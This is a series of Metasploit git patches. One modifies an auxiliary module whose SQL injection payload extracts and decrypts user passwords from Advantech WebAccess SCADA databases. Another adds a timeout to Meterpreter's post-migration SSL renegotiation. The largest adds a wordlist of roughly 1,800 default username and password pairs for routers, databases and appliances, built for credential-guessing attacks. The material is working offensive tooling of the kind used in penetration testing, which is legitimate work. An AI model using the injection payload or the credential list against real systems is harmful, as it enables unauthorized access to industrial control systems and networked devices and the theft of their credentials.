b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 5d8d7b7886..4812b2a232 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -127,9 +127,9 @@ class Metasploit3 < Msf::Auxiliary # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin'] ) for i in 0..@users.length - 1 @@ -182,14 +182,25 @@ class Metasploit3 < Msf::Auxiliary :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" + :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] + + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])] end print_line(users_table.to_s) end + def user_type(database) + user_type = database + + unless database == "BAUser" + user_type << " (Web Access)" + end + + user_type + end + def decrypt_password(password, key) recovered_password = recover_password(password) recovered_key = recover_key(key) From d2ebab09aa267939a663a6b2fe80b9f0dae89774 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 16 May 2014 15:42:46 -0500 Subject: [PATCH 327/853] Add timeout for SSL renegotiation after migrating [SeeRM #8794] --- lib/rex/post/meterpreter/client_core.rb | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index a48b513825..b10c26ea90 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -266,7 +266,7 @@ class ClientCore < Extension end # Send the migration request (bump up the timeout to 60 seconds) - response = client.send_request( request, 60 ) + client.send_request( request, 60 ) if client.passive_service # Sleep for 5 seconds to allow the full handoff, this prevents @@ -282,12 +282,25 @@ class ClientCore < Extension # Now communicating with the new process ### - # Renegotiate SSL over this socket - client.swap_sock_ssl_to_plain() - client.swap_sock_plain_to_ssl() + # If renegotiation takes longer than a minute, it's a pretty + # good bet that migration failed and the remote side is hung. + # Since we have the comm_mutex here, we *must* release it to + # keep from hanging the packet dispatcher thread, which results + # in blocking the entire process. See Redmine #8794 + begin + Timeout.timeout(60) do + # Renegotiate SSL over this socket + client.swap_sock_ssl_to_plain() + client.swap_sock_plain_to_ssl() + end + rescue TimeoutError + client.alive = false + return false + end # Restart the socket monitor client.monitor_socket + end end From af82ae262cbe9d49feb679a43a984c6e7cfbdbb3 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Fri, 16 May 2014 23:27:18 +0200 Subject: [PATCH 328/853] Added a large default password list for services. --- .../default_passwords_large_unhash.txt | 1787 +++++++++++++++++ 1 file changed, 1787 insertions(+) create mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt new file mode 100644 index 0000000000..ff0458f94b --- /dev/null +++ b/data/wordlists/default_passwords_large_unhash.txt @@ -0,0 +1,1787 @@ +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 +aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! +install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install +root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init +PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! +admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat +REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya +supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass +PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys +http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys +SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 